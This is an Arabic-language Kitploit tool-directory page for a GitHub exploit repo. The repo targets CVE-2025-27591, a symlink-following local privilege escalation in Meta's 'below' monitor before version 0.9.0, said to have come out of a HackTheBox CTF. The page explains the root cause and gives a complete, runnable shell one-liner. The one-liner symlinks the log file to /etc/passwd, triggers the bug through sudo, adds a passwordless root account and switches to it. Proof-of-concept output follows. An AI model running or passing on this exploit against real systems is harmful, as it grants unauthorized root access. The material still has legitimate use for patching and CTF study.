Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-27591-Meta-below-LPE — CVE-2025-27591 – Meta below تصعيد الامتيازات المحلية عبر اتباع الروابط الرمزية (HackTheBox CTF) | Kitploit
أدوات/GitHubGitHub/rippsec/cve-2025-27591-meta-below-lpe
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةCTFاستغلال الملفات الثنائية
GitHubrippsec/cve-2025-27591-meta-below-lpe

CVE-2025-27591-Meta-below-LPE

CVE-2025-27591 – Meta below تصعيد الامتيازات المحلية عبر اتباع الروابط الرمزية (HackTheBox CTF)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

CVE-2025-27591 — رفع صلاحيات محلي عبر الروابط الرمزية في Meta below

نظرة عامة

الحقلالتفاصيل
CVECVE-2025-27591
البرنامجMeta below (مراقب موارد النظام)
الإصدارات المتأثرة< 0.9.0
الثغرةاتباع الروابط الرمزية → الكتابة العشوائية على الملفات كجذر
المصادقةمستخدم محلي مع صلاحية sudo لـ below
التأثيرتصعيد صلاحيات محلي إلى الجذر
السياقاُكتشف خلال مسابقة HackTheBox CTF

الوصف

أداة مراقبة موارد النظام below (من Meta Platforms, Inc.) تحتوي على ثغرة في آلية تسجيل الأخطاء. عند تشغيلها عبر sudo، تقوم بقوة بتعيين أذونات 0666 على ملفات السجل الموجودة في /var/log/below/ دون التحقق أولاً مما إذا كان المسار المستهدف رابطًا رمزيًا. وهذا يسمح لمهاجم محلي باستبدال ملف السجل برابط رمزي يشير إلى أي ملف قابل للكتابة كجذر، مما يؤدي فعليًا إلى استبداله بمحتوى مسيطر عليه.

التفاصيل الفنية

السبب الجذري

يقوم كود التسجيل في below < 0.9.0 بتنفيذ هذه العمليات بالتسلسل عند تشغيله كجذر:

  1. يحدد مسار السجل: /var/log/below/error_root.log
  2. ينشئ الملف أو يفتحه
  3. يستدعي chmod(path, 0o666) — دون التحقق مما إذا كان رابطًا رمزيًا
  4. يكتب رسالة الخطأ إلى المسار

في الخطوة 4، إذا تم استبدال المسار برابط رمزي قبل التنفيذ، فإن الكتابة تذهب إلى هدف الرابط الرمزي بدلاً من ذلك.

سلسلة الاستغلال

root@kitploit:~
مستخدم محلي
    │
    ▼
إزالة /var/log/below/error_root.log
    │
    ▼
إنشاء رابط رمزي: /var/log/below/error_root.log → /etc/passwd
    │
    ▼
تشغيل الخطأ عبر: sudo /usr/bin/below replay --time "invalid"
    │  (يفتح below ملف السجل، chmod 0666 يضرب /etc/passwd، يكتب الخطأ)
    ▼
/etc/passwd أصبح قابلاً للكتابة عالمياً
    │
    ▼
إضافة إدخال جذر مارق: rooted::0:0:root:/root:/bin/bash
    │
    ▼
su rooted → غلاف جذر

لماذا يعمل --time "invalid"

تمرير سلسلة زمنية غير صالحة يجبر below على تسجيل رسالة خطأ. يصل مسار الخطأ إلى كود التسجيل الذي يكتب بشكل أعمى إلى الملف، والذي أصبح الآن رابطنا الرمزي.

الاستخدام

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

المتطلب الأساسي: يجب أن يكون لدى المستخدم الحالي صلاحيات sudo لتنفيذ /usr/bin/below.

سطر واحد

root@kitploit:~
rm -f /var/log/below/error_root.log; \
ln -s /etc/passwd /var/log/below/error_root.log; \
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1; \
echo 'rooted::0:0:root:/root:/bin/bash' > /var/log/below/error_root.log; \
su rooted

إثبات المفهوم

root@kitploit:~
$ whoami
lowpriv
$ ./exploit.sh
# whoami
root

التصحيح

تم إصلاح الثغرة في إصدار below 0.9.0. يقدم الإصلاح فحصًا للرابط الرمزي قبل أي عمليات ملف في مسار التسجيل.

المراجع

  • إدخال NVD
  • Meta below على GitHub
تنزيل الأداة